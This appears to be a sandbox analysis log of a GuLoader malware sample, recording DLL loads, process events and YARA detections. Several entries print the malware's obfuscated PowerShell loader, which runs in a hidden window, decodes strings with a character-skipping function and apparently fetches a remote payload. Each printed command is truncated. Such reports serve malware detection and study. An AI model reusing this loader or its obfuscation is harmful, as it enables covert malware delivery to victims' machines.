Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 0000000B.00000002.2462762606.000000000E361000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1300165087.000002D446AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2462628571.0000000009B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2438738602.0000000005C84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdi
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
